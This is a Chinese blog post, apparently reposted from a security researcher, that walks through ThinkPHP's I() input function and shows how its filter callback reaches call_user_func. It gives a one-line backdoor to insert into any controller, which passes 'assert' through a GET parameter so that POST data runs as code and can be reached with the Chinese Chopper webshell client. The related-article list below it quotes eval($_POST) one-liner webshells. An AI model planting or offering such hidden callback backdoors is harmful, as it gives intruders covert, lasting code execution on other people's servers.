php如何留后门,ThinkPHP留后门技巧

最新推荐文章于 2023-10-24 17:44:18 发布
最新推荐文章于 2023-10-24 17:44:18 发布
阅读量1k 收藏 1
点赞数
文章标签: php如何留后门

欢迎来到阿八个人博客网站。本

阿八个人博客

网站提供最新的站长新闻,各种互联网资讯。

喜欢本站的朋友可以收藏本站,或者加QQ:我们大家一起来交流技术!

URL链接:https://www.abboke.com/rz/2019/1010/116721.html

90sec上有人问,我说了还有小白不会用。去年我审计TP的时候留意到的,干脆分析一下代码和操作过程。

thinkphp的I函数,是其处理输入的函数,一般用法为I('get.id')——从$_GET数组中取出键为id的值,post、cookie类似。

let me see see I函数的代码:

codehilite"><?phpfunction I($name, $default = '', $filter = null, $datas = null){ ... if ('' == $name) { // 获取全部变量 $data = $input; $filters = isset($filter) ? $filter : C('DEFAULT_FILTER'); if ($filters) { if (is_string($filters)) { $filters = explode(',', $filters); } foreach ($filters as $filter) { $data = array_map_recursive($filter, $data); // 参数过滤 } } } elseif (isset($input[$name])) { // 取值操作 $data = $input[$name]; $filters = isset($filter) ? $filter : C('DEFAULT_FILTER'); if ($filters) { if (is_string($filters)) { if (0 === strpos($filters, '/')) { if (1 !== preg_match($filters, (string) $data)) { // 支持正则验证 return isset($default) ? $default : null; } } else { $filters = explode(',', $filters); } } elseif (is_int($filters)) { $filters = array($filters); } if (is_array($filters)) { foreach ($filters as $filter) { if (function_exists($filter)) { $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // 参数过滤 } else { $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter)); if (false === $data) { return isset($default) ? $default : null; } } } } } ... return $data;}

I函数的第三个参数是$filter,作用是对变量的过滤。

新版本(3.2.3)中,$filter可以传入两种4种值:一个过滤函数(字符串)一些过滤函数组成的字符串,其间用“|”分割一些过滤函数的字符串组成的数组以“/”开头的正则表达式

可见代码,若$filter为空的话,其默认值为C('DEFAULT_FILTER')。我们在配置文件中可以看到,DEFAULT_FILTER=htmlspecialchars

26b2dfd2b2cc2135175f384887e69ac7.png

以上4个情况最后归为两个,1是过滤回调函数,2是过滤的正则。正则部分如下:

codehilite"><?phpif (0 === strpos($filters, '/')) { if (1 !== preg_match($filters, (string) $data)) { // 支持正则验证 return isset($default) ? $default : null; }}

如果第0个字符是/,则说明传入的是正则,用preg_match进行匹配验证,不匹配则返回默认值$default。

而回调函数部分,是我们留后门的关键。核心是这一段:

codehilite"><?phpif (is_array($filters)) { foreach ($filters as $filter) { if (function_exists($filter)) { $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // 参数过滤 } else { $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter)); if (false === $data) { return isset($default) ? $default : null; } } }}

如果函数存在,则直接调用array_map_recursive执行。如果函数不存在,则用php默认的过滤器filter_var进行过滤。

我们跟进array_map_recursive函数:

codehilite"><?phpfunction array_map_recursive($filter, $data){ $result = array(); foreach ($data as $key => $val) { $result[$key] = is_array($val) ? array_map_recursive($filter, $val) : call_user_func($filter, $val); } return $result;}

明显是一个递归执行的过程,最后调用的是call_user_func 。

还记得我说过的php回调后门么(https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html),ThinkPHP厚道,居然给我们预置了一个回调后门,让我们可以万分隐蔽的留下webshell。

所以,我们只需要随意找个controller,在可访问的方法中插入:

codehilite">I('post.90sec', '', I('get.i'));

如上,第三个参数就是刚说的$filter,我们只需要把回调后门函数名字(assert)作为第三个参数传入,即可构造一个回调后门。

我就拿thinkphp默认的IndexController下的index方法示例:

16fda95d45f01b7ce8a9bd6d68999840.png

如下即可执行任意代码:

93c90d76086abc02a6d8150f1d0995b7.png

一个回调后门,菜刀也可以连接。

高继扬
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
本文将深入探讨PHP隐形一句话后门及其与ThinkPHP框架加密码程序的关系,特别是涉及的`base64_decode`函数的危险性。隐形一句话后门是黑客植入Web应用中的隐蔽代码,通常用于远程控制和恶意活动。这种后门很难被检测...
php源码查后门,某一次排查源码后门的过程
weixin_39762856的博客
03-10 4301
源码藏后门这种事情,屡见不鲜了。文件包含,文件调用,拼接,大小马,htaccess文件做手脚等等………不过今天我就遇到个奇葩,藏了后门还不承认,非说是程序自带的。给大家看看程序结构先。我检查了我所知道的一切后门方式。也用扫描器查找了一般,以为安全了直接上服务器部署好了,域名解析开始使用。第二天,莫名其妙登录日志有其他人了。也没太在意,觉得应该是自己登录路径和密码设的不够复杂,被人试出来了。改了一下...
php自动生成后门代码,PHP后门代码
weixin_42587866的博客
03-10 981
http://blog.ddian.cn/?post=9801.[代码][PHP]代码$fp = '';$path = '';if(empty($_GET['action'])){if(empty($_GET['path'])){$_path = dirname(__FILE__);}else{if(is_dir($_GET['path'])){$_path = $_GET['path'];}el...
常见php后门分析
W小哥
05-31 792
一、第一种 <?php define('test', 1); #定义一个常量 test,并且值为1 $test = $_POST[test];#因为前面定义了常量 test且值为1,而此处用了常量test:“$_POST[test]”,所以post传输数据必须为1,否则与前面定义的常量不一致,导致报错 if(test == 1){ @eval($test);#一句话木马后门 } 连接方式 二、第二种 ...
常见的php后门,有趣的PHP后门
weixin_39678089的博客
04-08 565
前言最近我研究了一种不寻常的小技巧,特地撰写这篇文章来与大家分享。这篇文章提供了许多后门代码中使用的exit()基础知识,开箱即用。这篇文章的关注点在于全局变量GET,POST,REQUEST。最常用的函数(PHP 4, PHP 5, PHP 7)shell_exec - Execute command via shell and return the complete output as a s...
ThinkPHP内核个人发卡系统源码 Azhe发卡去后门+免授权发卡系统源码
06-10
ThinkPHP内核个人发卡系统源码,是基于著名的PHP框架ThinkPHP构建的一款高效、便捷的发卡平台。这款源码以其强大的功能和易用性,为个人和企业提供了自建发卡系统的理想解决方案。下面将详细探讨其主要知识点及应用...
thinkphp核心 伯乐发卡系统高级版PHP网站源码 已去授权无后门
04-17
建议使用宝塔面板安装,设置运行目录为public,测试环境为php7.0 mysql5.5 伪静态选择为thinkphp 授权已经去了,后台是/houtai超级密码是123456,部分有加密,无后门放心使用。
php隐藏后门,php如何隐藏后门
weixin_39603598的博客
03-09 262
php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。推荐:《PHP教程》php 后门隐藏技巧1. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名在 Windows 10下...
php后门屌炸天
dianlei9877的博客
11-04 211
fputs(fopen('a.php','w'),'<?php eval($_POST[cc])?>'); php后门有很多,包子也见多了和玩多了,但是在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码。事情是这样的,朋友的网站的利用各种查找后门的工具都没有发现php木马。老是找不到,小黑的伎俩很高级,每次使用完毕总是把后门删掉,但是每次都能继续进来,总是找不到从哪进...
php简单后门实现及php连接数据库
最新发布
qq_58683895的博客
10-24 926
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
php超强后门在任意位置创建文件,编写变态的PHP后门
weixin_35663032的博客
03-09 236
在这篇文章中,我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候,我们首先需要了解一些基础知识:(1)了解PHP(2)了解curl或者其他一些能够操作HTTP请求的工具还有一点需要大家了解的是PHP中异或(^)的概念。对于异或,大家肯定都有所了解,但是平常能用到的地方可能不多,最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概念,是因为异或在这种非字母数字的PHP...
php隐藏后门,PHP网站后门如何做到免杀和隐藏
weixin_39956022的博客
03-09 262
原标题:PHP网站后门如何做到免杀和隐藏后门当我们拿到一个网站的权限时,都会下一个后门。方便日后的管理与操作。但是,如果有一天,管理员把我们的后门删除掉了怎么办?!这就用到了我们现在要学的了,那就是免杀与隐藏!免杀免杀是指,我们通过加花等技术来绕过安全软件的扫描。防止被安全软件杀掉!(其实安全软件就是最大的木马!)隐藏我们好不容易上传了木马,万一再被管理员找到了怎么办?这就用到了我们的隐藏技术!...
php 程序后门,PHP后门程序
weixin_33376592的博客
03-17 438
*{font-size: 12px;}a{text-decoration: none; color: blue;}a:hover{text-decoration: underline; color:red;}$folder_count = $file_count = 0;function deleteAll($directory, $empty = false) {global $folder_c...
知乎高赞:我故意在代码里后门,违法吗?
weixin_68789096的博客
01-29 944
昨天我在逛知乎的时候,看到了这么一个问题:我看到了三个非常有意思的回答,分享给大家一看。首先是这个为了防止项目交付后收不到尾款埋下后门的回答:答主:特立独行的猪链接:https://www.zhihu.com/question/531724027/answer/2487270093编辑:编程技术宇宙早年给某台企做外包项目,定制一个Android系统的ROM。开发费用16万,一年期维护费用2万。开发费用分三期打款,订金4万,生产环境ROM交付8万,验收并交付源码后打尾款4万。
thinkphp5+远程代码执行_ThinkPHP5.0.x远程命令执行高危漏洞预警
weixin_39777543的博客
11-25 182
漏洞综述关于ThinkPHPThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,其借鉴了国外很多优秀的框架和模式,包括使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式等。该框架常被用来进行二次开发,国内应用非常广泛。漏洞原理Thinkphp处理请求的关键类为Request(thinkph...
php隐藏后门,php 后门隐藏技巧
weixin_28741707的博客
03-09 399
辛辛苦苦拿下的 shell,几天没看,管理员给删了。这篇文章是我个人小小的总结,很多方面都建立在自己理解上思考,如果你有更好的思路,各位表哥们也可以分享。隐藏隐藏的技巧很多,废话不多说直接开始。一. attrib +s +h创建系统隐藏文件:attrib +s +a +r +hattrib +s +h 文件名 查看隐藏文件 二. 利用 ADS 隐藏文件NTFS 交换数据流(Alternate Da...
ThinkPHP后门技巧
weixin_34014277的博客
11-18 334
原文链接:https://www.leavesongs.com/PENETRATION/thinkphp-callback-backdoor.html 90sec上有人问,我说了还有小白不会用。去年我审计TP的时候意到的,干脆分析一下代码和操作过程。 thinkphp的I函数,是其处理输入的函数,一般用法为I('get.id')——从$_GET数组中取出键为id的值,post、coo...
phpthinkphp
03-02
PHP是一种流行的开源服务器端脚本语言,用于创建动态网站和Web应用程序。它可以与HTML结合使用,支持数据库集成,并具有易于学习和使用的语法。 ThinkPHP是一种基于PHP的开源Web应用程序开发框架,它旨在提高开发人员的开发效率和代码可读性。ThinkPHP提供了一系列的工具和组件,包括模型-视图-控制器(MVC)架构、命令行工具、表单验证、路由和缓存等功能,可以帮助开发人员更快地构建高质量的Web应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值